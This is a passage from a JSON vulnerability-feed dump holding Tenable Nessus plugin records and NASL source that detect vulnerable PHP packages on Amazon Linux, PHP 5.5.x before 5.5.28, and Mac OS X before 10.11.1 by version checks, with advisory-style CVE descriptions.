value:\"p-cpe:/a:amazon:linux:php70-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php70-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-bcmath-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-cli-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-common-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-dba-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-dbg-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-debuginfo-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-devel-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-embedded-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-enchant-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-fpm-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-gd-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-gmp-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-imap-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-intl-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-json-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-ldap-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mbstring-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mcrypt-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mysqlnd-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-odbc-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-opcache-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pdo-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pdo-dblib-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pgsql-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-process-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pspell-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-recode-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-snmp-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-soap-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-tidy-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-xml-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-xmlrpc-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-zip-7.0.14-1.20.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php70 / php70-bcmath / php70-cli / php70-common / php70-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:02:49", "description": "According to its banner, the version of PHP running on the remote web server is 5.5.x prior to 5.5.28. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple use-after-free errors exist in spl_array.c, spl_observer.c, and spl_dllist.c due to improper sanitization of input to the unserialize() function. An attacker can exploit these issues, by using a specially crafted SplDoublyLinkedList, SplArrayObject, or SplObjectStorage object, to deference freed memory and thus execute arbitrary code. (CVE-2015-6831)\n\n - A dangling pointer error exists in file spl_array.c due to improper sanitization of input to the unserialize() function. An attacker can exploit this, by using a specially crafted SplDoublyLinkedList object, to gain control over a deallocated pointer and thus execute arbitrary code. (CVE-2015-6832)\n\n - A path traversal flaw exists in file phar_object.c due to improper sanitization of user-supplied input. An attacker can exploit this to write arbitrary files.\n (CVE-2015-6833)\n\n - A type confusion flaw exists in the serialize_function_call() function in soap.c due to improper validation of input passed via the header field. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-6836)\n\n - Multiple type confusion flaws exist in the _call() method in file php_http.c when handling calls for zend_hash_get_current_key or 'Z*'. An attacker can exploit this to disclose memory contents or crash an application using PHP. (CVE-2015-8835)\n\n - The openssl_random_pseudo_bytes() function in file openssl.c does not generate sufficiently random numbers.\n This allows an attacker to more easily predict the results, thus allowing further attacks to be carried out. (CVE-2015-8867)\n\n - A flaw exists in file zend_exceptions.c due to the improper use of the function unserialize() during recursive method calls. A remote attacker can exploit this to crash an application using PHP. (CVE-2015-8873)\n\n - A flaw exists in file zend_exceptions.c due to insufficient type checking by functions unserialize() and __toString(). A remote attacker can exploit this to cause a NULL pointer deference or unexpected method execution, thus causing an application using PHP to crash. (CVE-2015-8876)\n\n - An integer truncation flaw exists in the zend_hash_compare() function in zend_hash.c that is triggered when comparing arrays. A remote attacker can exploit this to cause arrays to be improperly matched during comparison.\n Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-08-11T00:00:00", "type": "nessus", "title": "PHP 5.5.x < 5.5.28 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8876"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_5_28.NASL", "href": "https://www.tenable.com/plugins/nessus/85299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85299);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-6836\",\n \"CVE-2015-8835\",\n \"CVE-2015-8867\",\n \"CVE-2015-8873\",\n \"CVE-2015-8876\"\n );\n script_xref(name:\"EDB-ID\", value:\"38304\");\n\n script_name(english:\"PHP 5.5.x < 5.5.28 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.5.x prior to 5.5.28. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple use-after-free errors exist in spl_array.c,\n spl_observer.c, and spl_dllist.c due to improper\n sanitization of input to the unserialize() function. An\n attacker can exploit these issues, by using a specially\n crafted SplDoublyLinkedList, SplArrayObject, or\n SplObjectStorage object, to deference freed memory and\n thus execute arbitrary code. (CVE-2015-6831)\n\n - A dangling pointer error exists in file spl_array.c due\n to improper sanitization of input to the unserialize()\n function. An attacker can exploit this, by using a\n specially crafted SplDoublyLinkedList object, to gain\n control over a deallocated pointer and thus execute\n arbitrary code. (CVE-2015-6832)\n\n - A path traversal flaw exists in file phar_object.c due\n to improper sanitization of user-supplied input. An\n attacker can exploit this to write arbitrary files.\n (CVE-2015-6833)\n\n - A type confusion flaw exists in the\n serialize_function_call() function in soap.c due to\n improper validation of input passed via the header\n field. A remote attacker can exploit this to execute\n arbitrary code. (CVE-2015-6836)\n\n - Multiple type confusion flaws exist in the _call()\n method in file php_http.c when handling calls for\n zend_hash_get_current_key or 'Z*'. An attacker can\n exploit this to disclose memory contents or crash\n an application using PHP. (CVE-2015-8835)\n\n - The openssl_random_pseudo_bytes() function in file\n openssl.c does not generate sufficiently random numbers.\n This allows an attacker to more easily predict the\n results, thus allowing further attacks to be carried\n out. (CVE-2015-8867)\n\n - A flaw exists in file zend_exceptions.c due to the\n improper use of the function unserialize() during\n recursive method calls. A remote attacker can exploit\n this to crash an application using PHP. (CVE-2015-8873)\n\n - A flaw exists in file zend_exceptions.c due to\n insufficient type checking by functions unserialize()\n and __toString(). A remote attacker can exploit this to\n cause a NULL pointer deference or unexpected method\n execution, thus causing an application using PHP to\n crash. (CVE-2015-8876)\n\n - An integer truncation flaw exists in the\n zend_hash_compare() function in zend_hash.c that is\n triggered when comparing arrays. A remote attacker can\n exploit this to cause arrays to be improperly matched\n during comparison.\n \nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.5.28\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Aug/17\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Aug/18\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Aug/19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=69793\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=70121\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.5.28 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8876\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.5)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.5\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.5.x\", port);\n\nif (version =~ \"^5\\.5\\.([0-9]|1[0-9]|2[0-7])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.5.28' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:41:35", "description": "The remote host is running a version of Mac OS X version 10.11.x prior to 10.11.1 and is affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n - ATS (CVE-2015-6985)\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n - Bom (CVE-2015-7006)\n - CFNetwork (CVE-2015-7023)\n - configd (CVE-2015-7015)\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n - Directory Utility (CVE-2015-6980)\n - Disk Images (CVE-2015-6995)\n - EFI (CVE-2015-7035)\n - File Bookmark (CVE-2015-6987)\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n - Grand Central Dispatch (CVE-2015-6989)\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n - IOAcceleratorFamily (CVE-2015-6996)\n - IOHIDFamily (CVE-2015-6974)\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n - libarchive (CVE-2015-6984)\n - MCX Application Restrictions (CVE-2015-7016)\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n - OpenGL (CVE-2015-5924)\n - OpenSSH (CVE-2015-6563)\n - Sandbox (CVE-2015-5945)\n - Script Editor (CVE-2015-7007)\n - Security (CVE-2015-6983, CVE-2015-7024)\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-27T00:00:00", "type": "nessus", "title": "Mac OS X 10.9.5 or later < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6563", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-0273", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-0235", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-6980", "CVE-2015-6996", "CVE-2015-6975", "CVE-2015-6992", "CVE-2015-7017", "CVE-2015-7006", "CVE-2015-7015", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5942", "CVE-2015-6989", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5939", "CVE-2015-6974", "CVE-2015-7019", "CVE-2015-7035", "CVE-2015-6995", "CVE-2015-7003", "CVE-2015-6985", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5944", "CVE-2015-6987", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-5938", "CVE-2015-5932", "CVE-2015-6984", "CVE-2015-7016", "CVE-2015-5945", "CVE-2015-7007", "CVE-2015-5943", "CVE-2015-7024", "CVE-2015-7010", "CVE-2015-5924", "CVE-2015-7009", "CVE-2015-5940", "CVE-2015-7023", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6993", "CVE-2015-7008", "CVE-2015-7018", "CVE-2015-6994", "CVE-2015-6988", "CVE-2015-6983"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "9324.PRM", "href": "https://www.tenable.com/plugins/nnm/9324", "sourceData": "Binary data 9324.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:33:16", "description": "The remote host is running a version of Mac OS X that is 10.9.5 or later but prior to 10.11.1 It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": null, "vector": null}, "published": "2015-10-29T00:00:00", "type": "nessus", "title": "Mac OS X < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-6151", "CVE-2014-3565", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5943", "CVE-2015-5944", "CVE-2015-5945", "CVE-2015-6563", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6974", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6980", "CVE-2015-6983", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6987", "CVE-2015-6988", "CVE-2015-6989", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6994", "CVE-2015-6995", "CVE-2015-6996", "CVE-2015-7003", "CVE-2015-7006", "CVE-2015-7007", "CVE-2015-7008", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7015", "CVE-2015-7016", "CVE-2015-7017", "CVE-2015-7018", "CVE-2015-7019", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-7023", "CVE-2015-7024", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_11_1.NASL", "href": "https://www.tenable.com/plugins/nessus/86654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86654);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2012-6151\",\n \"CVE-2014-3565\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5943\",\n \"CVE-2015-5944\",\n \"CVE-2015-5945\",\n \"CVE-2015-6563\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6974\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6980\",\n \"CVE-2015-6983\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6987\",\n \"CVE-2015-6988\",\n \"CVE-2015-6989\",\n \"CVE-2015-6990\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6994\",\n \"CVE-2015-6995\",\n \"CVE-2015-6996\",\n \"CVE-2015-7003\",\n \"CVE-2015-7006\",\n \"CVE-2015-7007\",\n \"CVE-2015-7008\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7015\",\n \"CVE-2015-7016\",\n \"CVE-2015-7017\",\n \"CVE-2015-7018\",\n \"CVE-2015-7019\",\n \"CVE-2015-7020\",\n \"CVE-2015-7021\",\n \"CVE-2015-7023\",\n \"CVE-2015-7024\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 64048,\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X < 10.11.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari User-Assisted Applescript Exec Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Cannot determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif 